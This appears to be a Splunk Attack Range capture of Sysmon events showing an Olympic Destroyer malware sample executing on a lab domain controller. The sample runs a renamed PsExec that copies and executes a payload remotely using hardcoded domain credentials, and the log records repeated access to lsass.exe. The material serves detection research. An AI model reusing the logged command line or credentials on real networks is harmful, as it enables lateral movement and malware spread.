10:56:54.850{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F6-6216-BB05-000000003802}6796C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.850{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F6-6216-BB05-000000003802}6796C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:54.812{C8EA50B7-12F6-6216-BB05-000000003802}6796C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.728{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F6-6216-BC05-000000003802}6740C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.728{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F6-6216-BC05-000000003802}6740C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.713{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A0E50BFE7EFE3CBD9AEBE67C077BD3CA,SHA256=21C9D2ECF0C2DF7D3DD8D2F6D72C39719FE2303FB39DBE4F980A60F9DB607C33,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.713{C8EA50B7-12F6-6216-BC05-000000003802}67405792C:\Windows\system32\conhost.exe{C8EA50B7-12F6-6216-BB05-000000003802}6796C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.681{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F6-6216-BC05-000000003802}6740C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.666{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F6-6216-BC05-000000003802}6740C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.550{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F6-6216-BB05-000000003802}6796C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.549{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.549{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.548{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.548{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.546{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12F6-6216-BB05-000000003802}6796C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.545{C8EA50B7-12F6-6216-BB05-000000003802}6796C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.545{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F6-6216-BB05-000000003802}6796C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.448{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84E798AAEBB51A98F7D30AA993C45EB8,SHA256=C46886ADC690E25162819C6E6872686972612199F160E4D7219EBF15360BAC6A,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000291702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.097{C8EA50B7-12F5-6216-B905-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.082{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F5-6216-B905-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.082{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F5-6216-B905-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:54.066{C8EA50B7-12F5-6216-B905-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.028{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F5-6216-BA05-000000003802}6656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.028{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F5-6216-BA05-000000003802}6656C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.013{C8EA50B7-12F5-6216-BA05-000000003802}66567164C:\Windows\system32\conhost.exe{C8EA50B7-12F5-6216-B905-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217749Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:55.120{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=591CCAFD67E5C8677B1FA7048120B604,SHA256=0821499B3F2EF9529742EEE872F2C8DC8389B35921B97AB788F2584711BAA38B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:55.781{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=537E2F4EB85A1F822F6CA1000BDDA4E1,SHA256=2038EF0D1B393CB19F4D0AB812FCD732D570AE6B3AF2EC66BDCAF20AB917F6FB,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000291740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:55.228{C8EA50B7-12F6-6216-BD05-000000003802}6780C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:55.197{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F6-6216-BD05-000000003802}6780C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:55.197{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F6-6216-BD05-000000003802}6780C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:55.166{C8EA50B7-12F6-6216-BD05-000000003802}6780C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000291736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:55.113{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3731AD536E68C32E72397D87257F9FE6,SHA256=F505BEBF356C540FA0B2C74F29D234A5E159CD4DC079713DCA5533ADBB919F50,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:55.097{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F7-6216-BE05-000000003802}4456C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:55.097{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F7-6216-BE05-000000003802}4456C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:55.065{C8EA50B7-12F7-6216-BE05-000000003802}44566608C:\Windows\system32\conhost.exe{C8EA50B7-12F6-6216-BD05-000000003802}6780C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000291732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.546{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53640-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000291731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 